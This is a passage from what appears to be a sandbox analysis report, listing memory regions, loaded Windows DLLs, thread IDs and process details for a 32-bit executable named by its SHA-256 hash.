id = 1401
start_va = 0x7ffc5b700000
end_va = 0x7ffc5b75bfff
monitored = 0
entry_point = 0x7ffc5b716f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1402
start_va = 0x7ffc5b7b0000
end_va = 0x7ffc5b7c6fff
monitored = 0
entry_point = 0x7ffc5b7b79d0
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1403
start_va = 0x7ffc5b8d0000
end_va = 0x7ffc5b8dafff
monitored = 0
entry_point = 0x7ffc5b8d19a0
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1404
start_va = 0x7ffc5b910000
end_va = 0x7ffc5b930fff
monitored = 0
entry_point = 0x7ffc5b920250
region_type = mapped_file
name = "joinutil.dll"
filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll")
Region:
id = 1405
start_va = 0x7ffc5b960000
end_va = 0x7ffc5b999fff
monitored = 0
entry_point = 0x7ffc5b968d20
region_type = mapped_file
name = "ntasn1.dll"
filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")
Region:
id = 1406
start_va = 0x7ffc5b9a0000
end_va = 0x7ffc5b9c6fff
monitored = 0
entry_point = 0x7ffc5b9b0aa0
region_type = mapped_file
name = "ncrypt.dll"
filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")
Region:
id = 1407
start_va = 0x7ffc5bab0000
end_va = 0x7ffc5badcfff
monitored = 0
entry_point = 0x7ffc5bac9d40
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1408
start_va = 0x7ffc5bc40000
end_va = 0x7ffc5bc95fff
monitored = 0
entry_point = 0x7ffc5bc50bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1409
start_va = 0x7ffc5bca0000
end_va = 0x7ffc5bcb8fff
monitored = 0
entry_point = 0x7ffc5bca5e10
region_type = mapped_file
name = "eventaggregation.dll"
filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll")
Region:
id = 1410
start_va = 0x7ffc5bcc0000
end_va = 0x7ffc5bce8fff
monitored = 0
entry_point = 0x7ffc5bcd4530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1411
start_va = 0x7ffc5bcf0000
end_va = 0x7ffc5bd88fff
monitored = 0
entry_point = 0x7ffc5bd1f4e0
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1412
start_va = 0x7ffc5be30000
end_va = 0x7ffc5be43fff
monitored = 0
entry_point = 0x7ffc5be352e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1413
start_va = 0x7ffc5be50000
end_va = 0x7ffc5be5efff
monitored = 0
entry_point = 0x7ffc5be53210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1414
start_va = 0x7ffc5be60000
end_va = 0x7ffc5be6ffff
monitored = 0
entry_point = 0x7ffc5be656e0
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1415
start_va = 0x7ffc5be70000
end_va = 0x7ffc5bebafff
monitored = 0
entry_point = 0x7ffc5be735f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1416
start_va = 0x7ffc5bec0000
end_va = 0x7ffc5bf02fff
monitored = 0
entry_point = 0x7ffc5bed4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1417
start_va = 0x7ffc5bf10000
end_va = 0x7ffc5bf95fff
monitored = 0
entry_point = 0x7ffc5bf1d8f0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 1418
start_va = 0x7ffc5bfa0000
end_va = 0x7ffc5c187fff
monitored = 0
entry_point = 0x7ffc5bfcba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1419
start_va = 0x7ffc5c190000
end_va = 0x7ffc5c356fff
monitored = 0
entry_point = 0x7ffc5c1edb80
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1420
start_va = 0x7ffc5c360000
end_va = 0x7ffc5c3b4fff
monitored = 0
entry_point = 0x7ffc5c377970
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 1421
start_va = 0x7ffc5c3c0000
end_va = 0x7ffc5ca03fff
monitored = 0
entry_point = 0x7ffc5c5864b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 1422
start_va = 0x7ffc5cac0000
end_va = 0x7ffc5cb29fff
monitored = 0
entry_point = 0x7ffc5caf6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1423
start_va = 0x7ffc5cb30000
end_va = 0x7ffc5cb46fff
monitored = 0
entry_point = 0x7ffc5cb31390
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 1424
start_va = 0x7ffc5cb50000
end_va = 0x7ffc5cc04fff
monitored = 0
entry_point = 0x7ffc5cb922e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 1425
start_va = 0x7ffc5cc10000
end_va = 0x7ffc5cc6bfff
monitored = 0
entry_point = 0x7ffc5cc2b720
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1426
start_va = 0x7ffc5cc80000
end_va = 0x7ffc5e1defff
monitored = 0
entry_point = 0x7ffc5cde11f0
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1427
start_va = 0x7ffc5e1e0000
end_va = 0x7ffc5e2a0fff
monitored = 0
entry_point = 0x7ffc5e200da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1428
start_va = 0x7ffc5e2b0000
end_va = 0x7ffc5e3cbfff
monitored = 0
entry_point = 0x7ffc5e2f02b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1429
start_va = 0x7ffc5e3e0000
end_va = 0x7ffc5e522fff
monitored = 0
entry_point = 0x7ffc5e408210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1430
start_va = 0x7ffc5e740000
end_va = 0x7ffc5e7aafff
monitored = 0
entry_point = 0x7ffc5e7590c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1431
start_va = 0x7ffc5e7b0000
end_va = 0x7ffc5e801fff
monitored = 0
entry_point = 0x7ffc5e7bf530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1432
start_va = 0x7ffc5e850000
end_va = 0x7ffc5e8ecfff
monitored = 0
entry_point = 0x7ffc5e8578a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1433
start_va = 0x7ffc5e8f0000
end_va = 0x7ffc5e94afff
monitored = 0
entry_point = 0x7ffc5e9038b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1434
start_va = 0x7ffc5e950000
end_va = 0x7ffc5e957fff
monitored = 0
entry_point = 0x7ffc5e951ea0
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1435
start_va = 0x7ffc5e960000
end_va = 0x7ffc5eab5fff
monitored = 0
entry_point = 0x7ffc5e96a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1436
start_va = 0x7ffc5ec20000
end_va = 0x7ffc5ecc6fff
monitored = 0
entry_point = 0x7ffc5ec358d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1437
start_va = 0x7ffc5ecd0000
end_va = 0x7ffc5ed7cfff
monitored = 0
entry_point = 0x7ffc5ece81a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1438
start_va = 0x7ffc5ee90000
end_va = 0x7ffc5f2b8fff
monitored = 0
entry_point = 0x7ffc5eeb8740
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1439
start_va = 0x7ffc5f2c0000
end_va = 0x7ffc5f53cfff
monitored = 0
entry_point = 0x7ffc5f394970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1440
start_va = 0x7ffc5f540000
end_va = 0x7ffc5f6c5fff
monitored = 0
entry_point = 0x7ffc5f58ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1441
start_va = 0x7ffc5f760000
end_va = 0x7ffc5f806fff
monitored = 0
entry_point = 0x7ffc5f76b4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1442
start_va = 0x7ffc5f810000
end_va = 0x7ffc5f9d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1547
start_va = 0x560000
end_va = 0x560fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000560000"
filename = ""
Region:
id = 1890
start_va = 0x6f00000
end_va = 0x6ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006f00000"
filename = ""
Region:
id = 1891
start_va = 0x7100000
end_va = 0x71fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007100000"
filename = ""
Region:
id = 1892
start_va = 0x7400000
end_va = 0x74fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007400000"
filename = ""
Region:
id = 1894
start_va = 0x3200000
end_va = 0x327ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003200000"
filename = ""
Region:
id = 1895
start_va = 0x3280000
end_va = 0x32fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003280000"
filename = ""
Region:
id = 1896
start_va = 0x4080000
end_va = 0x417ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004080000"
filename = ""
Region:
id = 1897
start_va = 0x7ffc59400000
end_va = 0x7ffc59450fff
monitored = 0
entry_point = 0x7ffc594025e0
region_type = mapped_file
name = "cscobj.dll"
filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll")
Region:
id = 1898
start_va = 0x4380000
end_va = 0x447ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004380000"
filename = ""
Thread:
id = 19
os_tid = 0xc98
Thread:
id = 20
os_tid = 0xe08
Thread:
id = 21
os_tid = 0x9f0
Thread:
id = 22
os_tid = 0x680
Thread:
id = 23
os_tid = 0x1308
Thread:
id = 24
os_tid = 0x12f8
Thread:
id = 25
os_tid = 0x12dc
Thread:
id = 26
os_tid = 0x1270
Thread:
id = 27
os_tid = 0x1200
Thread:
id = 28
os_tid = 0x7cc
Thread:
id = 29
os_tid = 0x7e0
Thread:
id = 30
os_tid = 0x3c0
Thread:
id = 31
os_tid = 0xe90
Thread:
id = 32
os_tid = 0x424
Thread:
id = 33
os_tid = 0x3d4
Thread:
id = 34
os_tid = 0x41c
Thread:
id = 35
os_tid = 0xe4c
Thread:
id = 36
os_tid = 0xc48
Thread:
id = 37
os_tid = 0xe44
Thread:
id = 38
os_tid = 0xba4
Thread:
id = 39
os_tid = 0xe3c
Thread:
id = 40
os_tid = 0x514
Thread:
id = 41
os_tid = 0x45c
Thread:
id = 42
os_tid = 0x3b4
Thread:
id = 43
os_tid = 0x388
Thread:
id = 44
os_tid = 0x334
Thread:
id = 45
os_tid = 0x27c
Thread:
id = 46
os_tid = 0xdb0
Thread:
id = 47
os_tid = 0xa34
Thread:
id = 48
os_tid = 0xdd8
Thread:
id = 49
os_tid = 0xa44
Thread:
id = 50
os_tid = 0xcfc
Thread:
id = 51
os_tid = 0xf30
Thread:
id = 52
os_tid = 0x364
Thread:
id = 53
os_tid = 0x300
Thread:
id = 54
os_tid = 0xc28
Thread:
id = 55
os_tid = 0x904
Thread:
id = 56
os_tid = 0xc18
Thread:
id = 57
os_tid = 0xc34
Thread:
id = 58
os_tid = 0x5bc
Thread:
id = 59
os_tid = 0x5f4
Thread:
id = 60
os_tid = 0x938
Thread:
id = 61
os_tid = 0xc0c
Thread:
id = 62
os_tid = 0xc14
Thread:
id = 63
os_tid = 0xffc
Thread:
id = 64
os_tid = 0xfcc
Thread:
id = 65
os_tid = 0xf9c
Thread:
id = 66
os_tid = 0xf6c
Thread:
id = 67
os_tid = 0xc64
Thread:
id = 68
os_tid = 0xb4c
Thread:
id = 69
os_tid = 0x9fc
Thread:
id = 70
os_tid = 0x9d8
Thread:
id = 71
os_tid = 0x9b4
Thread:
id = 72
os_tid = 0x9ac
Thread:
id = 73
os_tid = 0x9a4
Thread:
id = 74
os_tid = 0x950
Thread:
id = 75
os_tid = 0x94c
Thread:
id = 76
os_tid = 0x948
Thread:
id = 77
os_tid = 0x8f8
Thread:
id = 78
os_tid = 0x8c4
Thread:
id = 79
os_tid = 0x8b0
Thread:
id = 80
os_tid = 0x894
Thread:
id = 81
os_tid = 0x888
Thread:
id = 82
os_tid = 0x86c
Thread:
id = 83
os_tid = 0x840
Thread:
id = 84
os_tid = 0x4f4
Thread:
id = 85
os_tid = 0x464
Thread:
id = 86
os_tid = 0x4d0
Thread:
id = 87
os_tid = 0x420
Thread:
id = 88
os_tid = 0x7c0
Thread:
id = 89
os_tid = 0x608
Thread:
id = 90
os_tid = 0x4f8
Thread:
id = 91
os_tid = 0x49c
Thread:
id = 92
os_tid = 0x2ac
Thread:
id = 93
os_tid = 0x1b4
Thread:
id = 94
os_tid = 0x1b8
Thread:
id = 95
os_tid = 0x1cc
Thread:
id = 96
os_tid = 0x16c
Thread:
id = 97
os_tid = 0x190
Thread:
id = 98
os_tid = 0x3fc
Thread:
id = 99
os_tid = 0x3f4
Thread:
id = 100
os_tid = 0x3e8
Thread:
id = 101
os_tid = 0x3e4
Thread:
id = 102
os_tid = 0x3d0
Thread:
id = 103
os_tid = 0x3cc
Thread:
id = 104
os_tid = 0x348
Thread:
id = 142
os_tid = 0x928
Thread:
id = 143
os_tid = 0x87c
Thread:
id = 144
os_tid = 0x17c
Thread:
id = 145
os_tid = 0xa6c
Thread:
id = 146
os_tid = 0x8fc
Thread:
id = 147
os_tid = 0x308
Thread:
id = 148
os_tid = 0x4cc
Process:
id = "5"
image_name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
page_root = "0x20870000"
os_pid = "0x9a8"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0xaf0"
cmd_line = "\"{path}\""
cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1444
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1445
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1446
start_va = 0x40000
end_va = 0x54fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1447
start_va = 0x60000
end_va = 0x9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 1448
start_va = 0xa0000
end_va = 0x19ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 1449
start_va = 0x1a0000
end_va = 0x1a3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 1450
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 1451
start_va = 0x1c0000
end_va = 0x1c1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1452
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1453
start_va = 0x400000
end_va = 0x587fff
monitored = 1
entry_point = 0x583f8e
region_type = mapped_file
name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")
Region:
id = 1454
start_va = 0x77260000
end_va = 0x773dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1455
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1456
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1457
start_va = 0x7fff0000
end_va = 0x7ffc5f80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1458
start_va = 0x7ffc5f810000
end_va = 0x7ffc5f9d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1459
start_va = 0x7ffc5f9d1000
end_va = 0x7ffffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00007ffc5f9d1000"
filename = ""
Region:
id = 1460
start_va = 0x400000
end_va = 0x437fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1461
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 1462
start_va = 0x62ee0000
end_va = 0x62f2ffff
monitored = 0
entry_point = 0x62ef8180
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1463
start_va = 0x62f30000
end_va = 0x62fa9fff
monitored = 0
entry_point = 0x62f43290
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1464
start_va = 0x74530000
end_va = 0x7460ffff
monitored = 0
entry_point = 0x74543980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1465
start_va = 0x62fb0000
end_va = 0x62fb7fff
monitored = 0
entry_point = 0x62fb17c0
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1466
start_va = 0x490000
end_va = 0x6cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 1467
start_va = 0x6cd30000
end_va = 0x6cd88fff
monitored = 1
entry_point = 0x6cd40780
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 1468
start_va = 0x74530000
end_va = 0x7460ffff
monitored = 0
entry_point = 0x74543980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1469
start_va = 0x76c20000
end_va = 0x76d9dfff
monitored = 0
entry_point = 0x76cd1b90
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1470
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1471
start_va = 0x7feb0000
end_va = 0x7ffaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007feb0000"
filename = ""
Region:
id = 1472
start_va = 0x490000
end_va = 0x54dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1473
start_va = 0x5d0000
end_va = 0x6cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 1474
start_va = 0x6d0000
end_va = 0x82ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006d0000"
filename = ""
Region:
id = 1475
start_va = 0x20000
end_va = 0x23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 1476
start_va = 0x76a90000
end_va = 0x76b0afff
monitored = 0
entry_point = 0x76aae970
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1477
start_va = 0x74290000
end_va = 0x7434dfff
monitored = 0
entry_point = 0x742c5630
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1478
start_va = 0x440000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000440000"
filename = ""
Region:
id = 1479
start_va = 0x6d0000
end_va = 0x7cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006d0000"
filename = ""
Region:
id = 1480
start_va = 0x820000
end_va = 0x82ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000820000"
filename = ""
Region:
id = 1481
start_va = 0x74a40000
end_va = 0x74a83fff
monitored = 0
entry_point = 0x74a59d80
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1482
start_va = 0x75f60000
end_va = 0x7600cfff
monitored = 0
entry_point = 0x75f74f00
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1483
start_va = 0x73f90000
end_va = 0x73fadfff
monitored = 0
entry_point = 0x73f9b640
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1484
start_va = 0x73f80000
end_va = 0x73f89fff
monitored = 0
entry_point = 0x73f82a00
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1485
start_va = 0x75ef0000
end_va = 0x75f47fff
monitored = 0
entry_point = 0x75f325c0
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 1486
start_va = 0x830000
end_va = 0x9cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000830000"
filename = ""
Region:
id = 1487
start_va = 0x6c4f0000
end_va = 0x6c568fff
monitored = 1
entry_point = 0x6c4ff82a
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 1488
start_va = 0x76f60000
end_va = 0x76fa4fff
monitored = 0
entry_point = 0x76f7de90
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1489
start_va = 0x76da0000
end_va = 0x76f5cfff
monitored = 0
entry_point = 0x76e82a10
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 1490
start_va = 0x76010000
end_va = 0x7615efff
monitored = 0
entry_point = 0x760c6820
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1491
start_va = 0x76300000
end_va = 0x76446fff
monitored = 0
entry_point = 0x76311cf0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1492
start_va = 0x1d0000
end_va = 0x1f9fff
monitored = 0
entry_point = 0x1d5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1493
start_va = 0x830000
end_va = 0x9b7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000830000"
filename = ""
Region:
id = 1494
start_va = 0x9c0000
end_va = 0x9cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009c0000"
filename = ""
Region:
id = 1495
start_va = 0x77150000
end_va = 0x7717afff
monitored = 0
entry_point = 0x77155680
region_type = mapped_file
name = "imm32.dll"
